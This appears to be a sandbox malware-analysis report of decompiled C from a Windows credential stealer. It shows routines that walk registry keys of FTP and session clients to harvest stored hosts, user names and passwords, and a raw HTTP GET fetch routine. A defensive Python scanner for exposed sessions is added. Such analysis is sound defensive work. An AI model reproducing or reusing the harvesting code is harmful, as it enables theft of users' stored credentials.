                                                                    0x00405f69
                                                                    0x00405f6f
                                                                    0x00405f76
                                                                    0x00405f76
                                                                    0x00405f96
                                                                    0x00405f9b
                                                                    0x00405f9d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405fc1
                                                                    0x00405fc7
                                                                    0x00405fe4
                                                                    0x00406002
                                                                    0x00406020
                                                                    0x0040603e
                                                                    0x00406061
                                                                    0x00406063
                                                                    0x0040607e
                                                                    0x00406080
                                                                    0x00406083
                                                                    0x00406083
                                                                    0x00406088
                                                                    0x0040606e
                                                                    0x00406070
                                                                    0x00406077
                                                                    0x00406077
                                                                    0x00406099
                                                                    0x004060ed
                                                                    0x004060fb
                                                                    0x004060fb
                                                                    0x00406106
                                                                    0x00406111
                                                                    0x0040611c
                                                                    0x00406127
                                                                    0x00406132
                                                                    0x00406137
                                                                    0x00406137
                                                                    0x00000000
                                                                    0x00406142
                                                                    0x00406148

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 00405F62
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00405F96
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406142
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumFreeLocalOpen
                                                                    • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                                                    • API String ID: 3369285772-3748300950
                                                                    • Opcode ID: c219dffec34b9dac28dc5d71a2502feea79d2819afc824340b3d4f055c4d4771
                                                                    • Instruction ID: 2d9a8220eb6bbd75a2f462893fd11e2b037df868adfd8f9c06f9ac5482d37282
                                                                    • Opcode Fuzzy Hash: c219dffec34b9dac28dc5d71a2502feea79d2819afc824340b3d4f055c4d4771
                                                                    • Instruction Fuzzy Hash: 0841053194011CEADF216B61CC42FDD7AB9BF44304F10C5BAB545780F1CB7A5AA1AF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040717C(intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				intOrPtr _v2088;
                                                                    				long _t56;
                                                                    				long _t57;
                                                                    				long _t60;
                                                                    
                                                                    				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t57 = _t56;
                                                                    				if(_t57 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t60 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t61 = _t60;
                                                                    						if(_t60 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t61, _a12, "\\"),  &_v2064);
                                                                    						E004018B8(_t62);
                                                                    						_v2080 = E00401D71(_a8, _v2068, "Password", 0);
                                                                    						_v2084 = E00401D71(_a8, _v2068, "_Password", 0);
                                                                    						_v2072 = E00401D71(_a8, _v2068, "Server", 0);
                                                                    						_v2076 = E00401D71(_a8, _v2068, "UserName", 0);
                                                                    						_v2088 = E00401D71(_a8, _v2068, "Directory", 0);
                                                                    						if(_v2080 != 0 || _v2084 != 0) {
                                                                    							if(_v2072 != 0 && _v2076 != 0) {
                                                                    								E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084), _a4, _v2088);
                                                                    							}
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2084);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2088);
                                                                    						E0040717C(_a4, _a8, _v2068);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t57;
                                                                     			}
                                                                    0x0040718f
                                                                    0x00407194
                                                                    0x00407196
                                                                    0x0040719c
                                                                    0x004071a3
                                                                    0x004071a3
                                                                    0x004071c3
                                                                    0x004071c8
                                                                    0x004071ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004071ee
                                                                    0x004071f4
                                                                    0x0040720e
                                                                    0x00407229
                                                                    0x00407244
                                                                    0x0040725f
                                                                    0x0040727a
                                                                    0x00407287
                                                                    0x00407299
                                                                    0x004072f2
                                                                    0x004072f2
                                                                    0x00407299
                                                                    0x004072fd
                                                                    0x00407308
                                                                    0x00407313
                                                                    0x0040731e
                                                                    0x00407329
                                                                    0x0040733a
                                                                    0x00407345
                                                                    0x0040734a
                                                                    0x0040734a
                                                                    0x00000000
                                                                    0x00407355
                                                                    0x0040735b

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040718F
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 004071C3
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407355
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: Directory$Password$Server$UserName$_Password
                                                                    • API String ID: 1332880857-3317168126
                                                                    • Opcode ID: ef5c1110db26fa909224c7a07f4a048dc71dc14832a81852d21dd845414aab36
                                                                    • Instruction ID: 54a0982324a7ff5f3bc78d2f041cd7ab304232967b033089dd6db8ff381706e5
                                                                    • Opcode Fuzzy Hash: ef5c1110db26fa909224c7a07f4a048dc71dc14832a81852d21dd845414aab36
                                                                    • Instruction Fuzzy Hash: 3B41D33184011CBADF226F51CC42BDDBABABF04344F14C1BAB958741B1DB7A5B91AF89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040D9FA(void* _a4, char* _a8, intOrPtr _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				char _v2088;
                                                                    				char* _v2092;
                                                                    				long _t57;
                                                                    				long _t58;
                                                                    				long _t61;
                                                                    
                                                                    				_t57 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                    				_t58 = _t57;
                                                                    				if(_t58 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t61 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t62 = _t61;
                                                                    						if(_t61 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2092 = E00401DF8( &_v2064, E00401DF8(_t62, _a8, "\\"),  &_v2064);
                                                                    						E004018B8(_t63);
                                                                    						_v2068 = E00401D71(_a4, _v2092, "HostName", 0);
                                                                    						_v2072 = E00401D71(_a4, _v2092, "UserName", 0);
                                                                    						_v2076 = E00401D71(_a4, _v2092, "Password", 0);
                                                                    						_v2080 = E00401D71(_a4, _v2092, "PortNumber",  &_v2088);
                                                                    						_v2084 = E00401D71(_a4, _v2092, "TerminalType", 0);
                                                                    						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v2068), _a12, _v2072), _a12, _v2076);
                                                                    							E004015CB(E0040159F(_a12, _v2080, _v2088), _a12, _v2084);
                                                                    						}
                                                                    						E0040D9FA(_a4, _v2092, _a12);
                                                                    						E004018B8(_v2092);
                                                                    						E004018B8(_v2068);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2084);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t58;
                                                                     			}
                                                                    0x0040da0d
                                                                    0x0040da12
                                                                    0x0040da14
                                                                    0x0040da1a
                                                                    0x0040da21
                                                                    0x0040da21
                                                                    0x0040da41
                                                                    0x0040da46
                                                                    0x0040da48
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040da6c
                                                                    0x0040da72
                                                                    0x0040da8c
                                                                    0x0040daa7
                                                                    0x0040dac2
                                                                    0x0040dae2
                                                                    0x0040dafd
                                                                    0x0040db0a
                                                                    0x0040db50
                                                                    0x0040db72
                                                                    0x0040db72
                                                                    0x0040db83
                                                                    0x0040db8e
                                                                    0x0040db99
                                                                    0x0040dba4
                                                                    0x0040dbaf
                                                                    0x0040dbba
                                                                    0x0040dbc5
                                                                    0x0040dbca
                                                                    0x0040dbca
                                                                    0x00000000
                                                                    0x0040dbd5
                                                                    0x0040dbdb

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA0D
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040DA41
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DBD5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                     • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                                                    • API String ID: 1332880857-1017491782
                                                                    • Opcode ID: 7d0ffad731660568f56f8f0a0490f44f83ea71fa47bb78a974b8c01c4dd83acf
                                                                    • Instruction ID: 5f0e69666c37055548565fce8565ad50753ab55e3f11aef87143afabb8110fab
                                                                    • Opcode Fuzzy Hash: 7d0ffad731660568f56f8f0a0490f44f83ea71fa47bb78a974b8c01c4dd83acf
                                                                    • Instruction Fuzzy Hash: 8B41A471950118BADF226F51CC02FDD7ABAFF04344F1085BAB548750B1DF7A9AA1AF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                     			// Recursive registry walk over an FTP client's site store (the target application is not named in the
                                                                     			// report): opens _a12 under hive handle _a8, enumerates every subkey, reads five credential values and, when
                                                                     			// a usable set exists, appends one record to the report buffer _a4. The roles of the unnamed helpers are
                                                                     			// inferred from their arguments and call pattern, not from the report.
                                                                     			E004073A7(intOrPtr _a4, void* _a8, char* _a12) {
                                                                     				void* _v8;
                                                                     				int _v12;
                                                                     				int _v16;
                                                                     				char _v2064;
                                                                     				intOrPtr _v2068;
                                                                     				intOrPtr _v2072;
                                                                     				intOrPtr _v2076;
                                                                     				intOrPtr _v2080;
                                                                     				intOrPtr _v2084;
                                                                     				intOrPtr _v2088;
                                                                     				long _t56;
                                                                     				long _t57;
                                                                     				long _t60;
                                                                     
                                                                     				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                     				_t57 = _t56;
                                                                     				if(_t57 == 0) {
                                                                     					_v12 = 0; // subkey index
                                                                     					while(1) {
                                                                     						_v16 = 0x7ff; // size of the subkey-name buffer _v2064
                                                                     						_t60 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                     						_t61 = _t60;
                                                                     						if(_t60 != 0) {
                                                                     							break; // ERROR_NO_MORE_ITEMS (or any failure) ends the enumeration
                                                                     						}
                                                                     						_v2068 = E00401DF8( &_v2064, E00401DF8(_t61, _a12, "\\"),  &_v2064); // _v2068 = _a12 + "\\" + subkey (string concat helper, inferred)
                                                                     						E004018B8(_t62); // free the intermediate string (E004018B8 = free, inferred)
                                                                     						_v2080 = E00401D71(_a8, _v2068, "FtpPassword", 0); // E00401D71: read a string value under hive/key (inferred); 0 when absent
                                                                     						_v2084 = E00401D71(_a8, _v2068, "_FtpPassword", 0);
                                                                     						_v2072 = E00401D71(_a8, _v2068, "FtpServer", 0);
                                                                     						_v2076 = E00401D71(_a8, _v2068, "FtpUserName", 0);
                                                                     						_v2088 = E00401D71(_a8, _v2068, "FtpDirectory", 0);
                                                                     						if(_v2080 != 0 || _v2084 != 0) { // at least one password value present
                                                                     							if(_v2072 != 0 && _v2076 != 0) { // plus a server and a user name; the directory is optional
                                                                     								// E00401569 writes the 0xbeef0000 record marker into _a4, then E004015CB appends each field in turn (inferred)
                                                                     								E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084), _a4, _v2088);
                                                                     							}
                                                                     						}
                                                                     						E004018B8(_v2080); // release the five value strings
                                                                     						E004018B8(_v2084);
                                                                     						E004018B8(_v2072);
                                                                     						E004018B8(_v2076);
                                                                     						E004018B8(_v2088);
                                                                     						E004073A7(_a4, _a8, _v2068); // recurse into the subkey before moving to the next sibling
                                                                     						E004018B8(_v2068);
                                                                     						_v12 = _v12 + 1;
                                                                     					}
                                                                     					return RegCloseKey(_v8);
                                                                     				}
                                                                     				return _t57; // RegOpenKeyA error code when the key does not exist
                                                                     			}

                                                                     Instruction addresses 0x004073ba - 0x00407586 (assembly column not captured in this extraction)

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 004073EE
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                                                    • API String ID: 1332880857-980612798
                                                                    • Opcode ID: 4b7ca1576e316fec70c5d8640cf292bae4574fe58d1b6cbb250eeb2e81953c95
                                                                    • Instruction ID: f08fa55c07ec5e6899d33725599ea259e95770034ce1eb7242ec538371f35ae2
                                                                    • Opcode Fuzzy Hash: 4b7ca1576e316fec70c5d8640cf292bae4574fe58d1b6cbb250eeb2e81953c95
                                                                    • Instruction Fuzzy Hash: CC41A33194011CBADF216F51CC42BDD7ABABF04344F14C1BAB958740B1DB7A5B91AF89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                     			// Same recursive walk as E004073A7, but the hive handle comes from the global at 0x414869 (set elsewhere,
                                                                     			// not in this excerpt) and the value names match a session store that keeps HostName/Username/Password/
                                                                     			// Port/HostDirName per host key. Helper roles are inferred from their arguments, as above.
                                                                     			E004061E4(intOrPtr _a4, char* _a8) {
                                                                     				void* _v8;
                                                                     				int _v12;
                                                                     				int _v16;
                                                                     				char _v2064;
                                                                     				intOrPtr _v2068;
                                                                     				intOrPtr _v2072;
                                                                     				intOrPtr _v2076;
                                                                     				intOrPtr _v2080;
                                                                     				intOrPtr _v2084;
                                                                     				intOrPtr _v2088;
                                                                     				long _t48;
                                                                     				long _t49;
                                                                     				long _t52;
                                                                     
                                                                     				_t48 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                     				_t49 = _t48;
                                                                     				if(_t49 == 0) {
                                                                     					_v12 = 0; // subkey index
                                                                     					while(1) {
                                                                     						_v16 = 0x7ff; // size of the subkey-name buffer _v2064
                                                                     						_t52 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                     						_t53 = _t52;
                                                                     						if(_t52 != 0) {
                                                                     							break; // ERROR_NO_MORE_ITEMS (or any failure) ends the enumeration
                                                                     						}
                                                                     						_v2068 = E00401DF8( &_v2064, E00401DF8(_t53, _a8, "\\"),  &_v2064); // _v2068 = _a8 + "\\" + subkey (inferred)
                                                                     						E004018B8(_t54); // free the intermediate string
                                                                     						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0); // read string values (inferred); 0 when absent
                                                                     						_v2072 = E00401D71( *0x414869, _v2068, "HostName", 0);
                                                                     						_v2084 = E00401D71( *0x414869, _v2068, "Port", 0);
                                                                     						_v2076 = E00401D71( *0x414869, _v2068, "Username", 0);
                                                                     						_v2088 = E00401D71( *0x414869, _v2068, "HostDirName", 0);
                                                                     						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) { // password, host and user name all required; port and directory optional
                                                                     							// 0xbeef0000 record marker followed by host, user, password, port, directory (inferred)
                                                                     							E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084), _a4, _v2088);
                                                                     						}
                                                                     						E004018B8(_v2080); // release the five value strings
                                                                     						E004018B8(_v2072);
                                                                     						E004018B8(_v2076);
                                                                     						E004018B8(_v2084);
                                                                     						E004018B8(_v2088);
                                                                     						E004061E4(_a4, _v2068); // recurse into the subkey
                                                                     						E004018B8(_v2068);
                                                                     						_v12 = _v12 + 1;
                                                                     					}
                                                                     					return RegCloseKey(_v8);
                                                                     				}
                                                                     				return _t49; // RegOpenKeyA error code when the key does not exist
                                                                     			}
                                                                     Instruction addresses 0x004061fa - 0x004063c9 (assembly column not captured in this extraction)

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040622E
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: HostDirName$HostName$Password$Port$Username
                                                                    • API String ID: 1332880857-791697221
                                                                    • Opcode ID: 7eba9d724454c8d3d3aac0edc315d2f4187c84c0ac834a3e46261e4250268ee2
                                                                    • Instruction ID: fc2fdb558613e9c2e8b18701f4f9e27659267ba30ef1847d2d636ab8c18341a6
                                                                    • Opcode Fuzzy Hash: 7eba9d724454c8d3d3aac0edc315d2f4187c84c0ac834a3e46261e4250268ee2
                                                                    • Instruction Fuzzy Hash: D641C33594011CBADF227B61CC42BDC7ABABF44344F10C5BAB554740F1DB7A5AA1AF88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
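The two walkers above (E004073A7 and E004061E4) share one pattern: descend a registry subtree with RegEnumKeyExA and emit a record for every key whose value names form a usable credential set. The script below is an added example for this report, not code from the sample or from the sandbox; it applies the same two value-name conditions to a registry export (.reg text) so a defender can list which stored sessions on a host would have been harvested. The export text is constructed and the client names in it are made up.

```python
"""Scan a Windows registry export (.reg text) for subkeys that hold the same
credential value sets the two decompiled walkers (E004073A7, E004061E4) look
for. Added example for this report, not code from the sample; the .reg text
at the bottom is constructed and the client names in it are made up."""
import re
from typing import Dict, List, Tuple

# Value-name sets copied from the decompiled conditions (lower-cased because
# registry value names are case-insensitive). E004073A7 emits a record when
# FtpServer and FtpUserName exist plus at least one of the two password
# values; E004061E4 needs HostName, Username and Password together.
PROFILES = {
    "E004073A7": ({"ftpserver", "ftpusername"}, {"ftppassword", "_ftppassword"}),
    "E004061E4": ({"hostname", "username", "password"}, set()),
}

_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for REGEDIT4 / 'Windows Registry Editor Version 5.00' text.

    Returns {key path: {value name: data}}. String data has its quotes and
    backslash escapes removed; other kinds (dword:, hex:) are kept as raw text
    because only the value names matter for this check.
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:  # header line before the first key
            continue
        m = _VALUE_RE.match(line)
        if not m:
            continue
        name = m.group(1) if m.group(1) is not None else "@"
        data = m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = re.sub(r"\\(.)", r"\1", data[1:-1])
        keys[current][name] = data
    return keys


def find_exposed_sessions(keys: Dict[str, Dict[str, str]], root: str) -> List[Tuple[str, str]]:
    """Equivalent of the malware's recursive descent from `root`: every key at or
    below root is tested against each profile; returns (profile, key path) hits."""
    hits: List[Tuple[str, str]] = []
    prefix = root.rstrip("\\") + "\\"
    for path in sorted(keys):
        if path != root and not path.startswith(prefix):
            continue
        names = {n.lower() for n in keys[path]}
        for profile, (required, any_of) in PROFILES.items():
            if required <= names and (not any_of or any_of & names):
                hits.append((profile, path))
    return hits


# Constructed export: two sessions that would be harvested, two that would not
# (one lacks any password value, one has a password but no host/user).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ExampleFtpClient\Sites\prod]
"FtpServer"="ftp.example.test"
"FtpUserName"="deploy"
"_FtpPassword"="hunter2"
"FtpDirectory"="/var/www"

[HKEY_CURRENT_USER\Software\ExampleFtpClient\Sites\anon]
"FtpServer"="mirror.example.test"
"FtpUserName"="anonymous"

[HKEY_CURRENT_USER\Software\ExampleSessionStore\Hosts\box1]
"HostName"="10.0.0.5"
"Username"="root"
"Password"="s3cret"
"Port"="22"
"HostDirName"="C:\\data"

[HKEY_CURRENT_USER\Software\Unrelated]
"Password"="x"
"""

if __name__ == "__main__":
    for profile, path in find_exposed_sessions(parse_reg_export(SAMPLE_REG), r"HKEY_CURRENT_USER\Software"):
        print(f"{profile}: {path}")
```

A real export produced with `reg export HKCU\Software out.reg` is UTF-16LE with a BOM, so read it with `open(path, encoding="utf-16")` before passing the text in. The check only reports keys whose value names satisfy the decompiled conditions; it does not decrypt or otherwise interpret the stored passwords, which is the sample's job, not the defender's.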

                                                                    C-Code - Quality: 81%
                                                                     			// Fetch a URL over a raw socket: split _a4 with WinINet's URL parser, canonicalise it, then hand-build an
                                                                     			// HTTP/1.0 GET with a fixed header set and a hard-coded User-Agent. _v68 is a URL_COMPONENTSA (0x3c bytes);
                                                                     			// _v52/_v48 are its lpszHostName/dwHostNameLength, _v20 its dwUrlPathLength and _v44 its nPort; 0x80000000
                                                                     			// is ICU_ESCAPE. The socket helpers E00403800/E00403884/E00403A78 (connect/send/receive, inferred from their
                                                                     			// arguments) and the lstrlen/closesocket thunks at L0041066A/L00410844 are outside this excerpt.
                                                                     			E00403BFF(void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                     				intOrPtr _v8;
                                                                     				long _v20;
                                                                     				void* _v24;
                                                                     				signed int _v44;
                                                                     				long _v48;
                                                                     				int _v52;
                                                                     				void* _v68;
                                                                     				CHAR* _v72;
                                                                     				int _v76;
                                                                     				char* _v80;
                                                                     				long _v84;
                                                                     				int _t53;
                                                                     				int _t61;
                                                                     				int _t67;
                                                                     				int _t71;
                                                                     				int _t72;
                                                                     				int _t73;
                                                                     				int _t75;
                                                                     				int _t76;
                                                                     
                                                                     				_t76 = 0; // return value; stays 0 on any failure
                                                                     				_v8 = E004018CF(0x2000); // host-name buffer (E004018CF wraps LocalAlloc, see APIs)
                                                                     				_v80 = E004018CF(0x2000); // URL-path buffer
                                                                     				_v72 = E004018CF(0x2000); // canonical URL, later reused for the request text
                                                                     				memset( &_v68, 0, 0x3c << 0);
                                                                     				_v68 = 0x3c; // dwStructSize = sizeof(URL_COMPONENTSA)
                                                                     				_v48 = 0x1fff; // dwHostNameLength
                                                                     				_v20 = 0x1fff; // dwUrlPathLength
                                                                     				_push(_v8);
                                                                     				_pop( *_t10); // lpszHostName = _v8
                                                                     				_push(_v80);
                                                                     				_pop( *_t12); // lpszUrlPath = _v80
                                                                     				_t53 = InternetCrackUrlA(_a4, 0, 0x80000000,  &_v68); // executed
                                                                     				if(_t53 == 0 || _v52 == 0) { // parse failed or the URL has no host component
                                                                     				} else {
                                                                     					_v84 = 0x1fff; // output buffer length for InternetCreateUrlA
                                                                     					_t61 = InternetCreateUrlA( &_v68, 0x80000000, _v72,  &_v84); // rebuild a canonical URL into _v72
                                                                     					__eflags = _t61;
                                                                     					if(_t61 != 0) {
                                                                     						 *_v80 = 0;
                                                                     						memset( &_v68, 0, 0x3c << 0);
                                                                     						_v68 = 0x3c;
                                                                     						_push(_v80);
                                                                     						_pop( *_t25); // only lpszUrlPath is set this time; the host stays in _v8 from the first pass
                                                                     						_v48 = 0x1fff;
                                                                     						_v20 = 0x1fff;
                                                                     						_t67 = InternetCrackUrlA(_v72, 0, 0,  &_v68); // second parse validates the canonical URL and re-extracts the path
                                                                     						__eflags = _t67;
                                                                     						if(_t67 == 0) {
                                                                     							L7:
                                                                     							L14:
                                                                     							E004018B8(_v80); // release the three buffers
                                                                     							E004018B8(_v72); // executed
                                                                     							E004018B8(_v8);
                                                                     							return _t76;
                                                                     						}
                                                                     						__eflags = _v52;
                                                                     						if(_v52 != 0) {
                                                                     							// The request text overwrites the canonical URL buffer: path first, then the host from the first parse.
                                                                     							wsprintfA(_v72, "GET %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n", _v80, _v8);
                                                                     							_t71 = E00403800(_v44 & 0x0000ffff, 0, _v8, 0, _v44 & 0x0000ffff); // executed; connect to host _v8 on nPort (low 16 bits of _v44), inferred
                                                                     							_t72 = _t71;
                                                                     							__eflags = _t72;
                                                                     							if(_t72 != 0) {
                                                                     								_v76 = _t72; // connected socket
                                                                     								_push(_v72);
                                                                     								L0041066A(); // lstrlen(request)
                                                                     								_t73 = E00403884(_v76, _v72, _t72); // executed; send(socket, request, length), inferred
                                                                     								__eflags = _t73;
                                                                     								if(__eflags != 0) {
                                                                     									_t75 = E00403A78(0, __eflags, _v76, _a8, _a12); // executed; receive and hand the response to the caller via _a8/_a12 (inferred)
                                                                     									_t76 = _t75;
                                                                     								}
                                                                     								_push(_v76);
                                                                     								L00410844(); // closesocket(socket)
                                                                     							}
                                                                     							goto L14;
                                                                     						}
                                                                     						goto L7;
                                                                     					}
                                                                     				}
                                                                     			}
                                                                     Instruction addresses 0x00403c07 - 0x00403d6a (assembly column not captured in this extraction)

                                                                    APIs
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
                                                                    • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
                                                                    • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
                                                                    • wsprintfA.USER32 ref: 00403CFB
                                                                    • lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
                                                                    • closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403D48
                                                                    Strings
                                                                    • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
                                                                    • <, xrefs: 00403CB6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
